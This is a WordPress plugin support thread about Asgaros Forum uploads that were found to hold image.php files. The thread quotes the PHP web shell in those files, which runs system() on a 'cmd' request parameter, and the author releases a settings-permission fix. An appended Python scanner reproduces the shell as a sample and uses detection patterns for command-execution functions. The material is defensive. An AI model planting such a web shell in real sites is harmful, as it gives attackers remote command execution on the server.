Support » Plugin: Asgaros Forum » VaultPress New security threats found on androidsage.com

  • Resolved sarangsss29

    (@sarangsss29)


    Hi. I have been using Asgaros forums. And today, VaultPress (Primary official WordPress backup and security plugin) gave me a security threat at the following locations:

    uploads/asgarosforum/19/image.php
    uploads/asgarosforum/20/image.php
    uploads/asgarosforum/21/image.php

    There is a file called image.php which has suspicious code:

    if (isset($_REQUEST['cmd'])) {
    @system($_REQUEST['cmd']);
    }

    Please review it and let me know if it is safe and from Asgaros.

  • Hi @sarangsss29
    Delete the files (image.php) and temporarily close the attachment files. Win.Trojan…
    Check for suspicious server files


    Yesterday faced with the same problem. In addition to writing the specified file (which was destroyed by the antivirus server) the forum flew settings to permit all and all, as well as the skin fell back to the default. The impression that the settings were simply overwritten. On the forum in the topic with ID 1 there was a bunch of those with the name Test and the message Test with attachment image.php.

    However, in other sections of the site, no suspicious activity was observed.

    @drahtigel

    The impression that the settings were simply overwritten.

    Settings changes via the database

    Settings changes via the database

    Is it possible another way to change the settings, such as the execution of any script via vulnerability in WP or the forum? The fact that access to the database is closed from the outside. Directly to work with databases, need to be located on the server to know the prefix, know the password for the database.

    @yworld Thanks for the tip. Deleted the files. Let’s hope they don’t occur again. I am not sure whether it’s a third-party code injection or occurred by default from Asgaros.
    If it’s a trojan, how did it get in there?

    After deleting the files, the forum got to default settings as stated by @drahtigel

    Thanks for all the help. What should I do next?

    @drahtigel
    Uploaded Shell and Backdoor

    @sarangsss29

    What should I do next?

    Wait for a solution to the problem. If this is from Asgaros.
    It is unclear what plugin or WP

    Plugin Author Asgaros

    (@asgaros)

    Hello everyone,

    thank you for this info. I will try to figure out what is going on.

    Plugin Author Asgaros

    (@asgaros)

    @sarangsss29
    @drahtigel
    @yworld

    I just released version 1.5.8 which should fix the bug that non-admin users could modify the settings of the forum. It could be possible that this bug allowed an attacker to modify the settings so that they could upload PHP files.

    Please install the latest version and give me feedback if those problems are gone. Sorry for the inconvenience! 🙁

    @asgaros Thank you!

    Yes. I believe the problem is gone. Thanks @asgaros
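Added example (not part of the original thread, and not Asgaros or VaultPress code): a triage scan for an uploads tree such as `uploads/asgarosforum/` that flags script files and request-driven command execution like the `image.php` reported above. The extension list, the regular expressions and the sample files are constructed assumptions.

```python
import os
import re
import tempfile

# Extensions a PHP handler may execute (assumed list; match it to the server config).
SCRIPT_EXT = {".php", ".phtml", ".php5", ".php7", ".phar", ".pht"}
# Request-controlled input passed straight to a command or code execution function.
EXEC_RE = re.compile(
    rb"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(\s*"
    rb"\$_(REQUEST|GET|POST|COOKIE)\b", re.I)
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.I)

def scan_uploads(root):
    """Return sorted (relative_path, reason) findings for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # first 1 MiB is enough for triage
            ext = os.path.splitext(name)[1].lower()
            if EXEC_RE.search(data):
                findings.append((rel, "request-driven-exec"))
            elif ext in SCRIPT_EXT:
                findings.append((rel, "script-in-uploads"))
            elif PHP_TAG_RE.search(data):
                findings.append((rel, "php-tag-in-non-script"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree mirroring the paths reported in the thread."""
    samples = {
        "19/image.php": b"<?php if (isset($_REQUEST['cmd'])) { @system($_REQUEST['cmd']); }",
        "20/notes.php": b"<?php echo 'hello';",
        "21/photo.jpg": b"\xff\xd8\xff\xe0JFIF<?php echo 1; ?>",
        "21/clean.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan_uploads(tmp):
            print(f"{reason:24} {rel}")
```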
